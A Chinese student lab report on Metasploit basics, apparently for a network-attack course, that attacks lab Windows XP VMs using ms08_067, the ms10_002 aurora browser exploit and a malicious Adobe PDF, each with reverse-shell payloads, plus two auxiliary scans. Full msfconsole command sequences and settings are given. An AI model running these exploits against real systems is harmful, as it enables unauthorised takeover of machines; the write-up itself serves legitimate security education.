博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20155320《网络对抗》MSF基础应用
阅读量:5141 次
发布时间:2019-06-13

本文共 2454 字,大约阅读时间需要 8 分钟。

20155320《网络对抗》MSF基础应用

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

    • 于exploit,我觉得exploit是利用一些工具和方法,通过一些渠道知道某些操作系统存在的漏洞并对漏洞资料进行分析研究,从而获取到了被攻击者计算机的相关信息,或者是可以进行提权等超级用户的操作
    • payload 感觉就是一段代码,通过运行这个代码可以实现漏洞攻击
    • encode,我觉得它就是一个加密工具

      实践过程

  • 使用到的虚拟机IP

虚拟机 IP地址
靶机2 Vivian xp 192.168.63.129
靶机3 192.168.63.131
攻击机 kali2 192.168.63.133

1071521-20180424111248116-434283084.png

1071521-20180425154709203-2027177103.png

1071521-20180425164346852-977265624.png

1.1一个主动攻击实践——ms08_067漏洞攻击;

这次需要用到靶机3和kali2

  • 在kali的终端中输入msfconsole进入控制台

  • 输入use exploit/windows/smb/ms08_067_netapi 使用该模块

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配

  • show playload可以查看可使用的载荷

1071521-20180425164630556-1458598863.png

  • set payload generic/shell_reverse_tcp,tcp反向回连

  • 输入如下完成配置

set LHOST 192.168.63.133 此IP是kali的IPset LPORT 5320 端口set RHOST 192.168.63.131 此IP是靶机WIN XP的IP,特定漏洞端口已经固定

1071521-20180425165936015-2022245185.png

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配
    ,输入set target 0

1071521-20180425165518404-1219188118.png

  • 输入exploit 进行攻击

1071521-20180425165129818-197361076.png

  • 然后成功攻击的标志是出现如下结果,成功获得了XP靶机的shellcode,输入命令ipconfig可以看到和在XP上一样的结果

1071521-20180425165236804-1671915050.png

MS10_002_aurora漏洞攻击;

  • 之前的配置和第一个主动攻击实验是一样的命令,依次输入如下即可
msfconsoleuse exploit/windows/browser/ms10_002_auroraset payload generic/shell_reverse_tcpset LHOST 192.168.63.133 //设置kali攻击IP,set RHOST 192.168.63.131set SRVPORT 5320
  • 查看配置项,确认无误

1071521-20180428205647647-521603886.png

  • 输入exploit 运行,成功生成了一个URL

1071521-20180428210416677-2007381151.png

  • 在靶机上的IE里输入URL,在攻击机kali上可以看到打开了session 1,但是奇怪的是他卡住了T_T,难受

1071521-20180428211651807-1571013030.png

1071521-20180428210943900-358761750.png

  • 我只能用session -i 1打开session1,成功取得靶机shell,输入ipconfig可以得到靶机的IP

1071521-20180428211226359-1516287001.png

1071521-20180428211338968-317340007.png

针对客户端的攻击:adobe_toolbutton

这次用的是vivian-XP和kali2

  • 进入MSF,后输入search adobe找到相应模块

1071521-20180428212756026-51857302.png

  • 输入以下命令,完成配置并创建pdf,打开显示隐藏文件,并在/root/.msf4/local/目录下找到20155320.pdf文件,如下图所示
use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模块set payload windows/meterpreter/reverse_tcpset LHOST 192.168.63.133 //设置kali攻击IP,set LPORT 5320set FILENAME 20155320.pdf

1071521-20180429100428531-1846675658.png

  • 将这个pdf拷到靶机上

1071521-20180429102603027-1192641470.png

  • 之后进入之前的监听模块,依次输入以下命令设置并监听即可,输入exploit后在靶机上打开pdf,回连成功(但是不知道为啥这个反应特别慢T_T)
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.63.133set LPORT 5320exploit

1071521-20180429144257667-1060303008.png

1071521-20180429143647660-1865881909.png

  • 成功获取shellcode之后输入ipconfig,确认连上了正确的靶机

1071521-20180429144136495-2054051622.png

成功应用任何一个辅助模块:我应用了两个

其中一个是跟风弄的scanner,为了和别人不一样我还应用了一个gather的

通过参考了解了如何学习使用MSF的模块

  • 输入命令show auxiliary查看所有辅助模块

    操作系统/类型/模块名称

1071521-20180429145957346-1392833823.png

1.gather/browser_info

这是一个搜集信息的模块

  • 通过命令info gather/browser_info,查看模块的配置信息

1071521-20180429164055195-1959010366.png

  • 输入use auxiliary/gather/browser_info使用这个模块,并根据要求设置相应的配置信息,目的是我要搜集Vivian-XP靶机的信息,所以将产生的URL网址在Vivian-XP的IE中打开,可以看到搜集到的信息如下:有windows系统类型,使用中文等信息,可以为攻击提供重要保障

1071521-20180429164247275-462923383.png

2.scanner/dcerpc/tcp_dcerpc_auditor

  • 我选择了模块scanner/dcerpc/tcp_dcerpc_auditor 进行试验,这是一个normal级别的,比较容易
    -输入use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor使用这个辅助模块,设置成功后,可以运行,发现成功了

1071521-20180429162916093-528795519.png

实验总结

这次的收获除了尝试了浏览器漏洞攻击、利用打开pdf攻击等有趣的攻击外,最大的收获是尝试了MSF的不同模块,发现原来使用起来都很便捷,按照要求配置好就可以应用了,同时发现MSF的功能也很多,信息搜集啥的简直不要太6了。

转载于:https://www.cnblogs.com/ljq1997/p/8969593.html

你可能感兴趣的文章
layui中radio的动态加载(进入修改页面时,设置radio)
查看>>
Java web分页技术(jsp+servlet+Dao+javabean)
查看>>
获取Excel文件内容,0307通用
查看>>
【转载】C#检测客户端输入的内容是否含有危险字符串
查看>>
四则运算2
查看>>
点聚合功能改良版本
查看>>
Tensorflow学习教程------读取数据、建立网络、训练模型,小巧而完整的代码示例...
查看>>
Linq to EF 与Linq to Object 使用心得
查看>>
Webform Repeater 显示主外键关系的两个表,参考代码
查看>>
fseek, _fseeki64 的区别
查看>>
USACO 5.1 Starry Night(模拟题)
查看>>
HDU 4433 locker(SPFA+DP)
查看>>
Hills And Valleys
查看>>
无敌简单快速的文件服务器sgfs
查看>>
Scala实战高手****第8课:零基础实战Scala最常用数据结构Map和Tuple及Spark源码鉴赏...
查看>>
Spring源码分析之——导入spring-framework源代码到Eclipse
查看>>
jQuery EasyUI API 中文文档 - 菜单(Menu)
查看>>
CSS气泡提示框 可自定义配置箭头
查看>>
PHP常用函数封装
查看>>
[SCM]源码管理 - perforce命令行高级
查看>>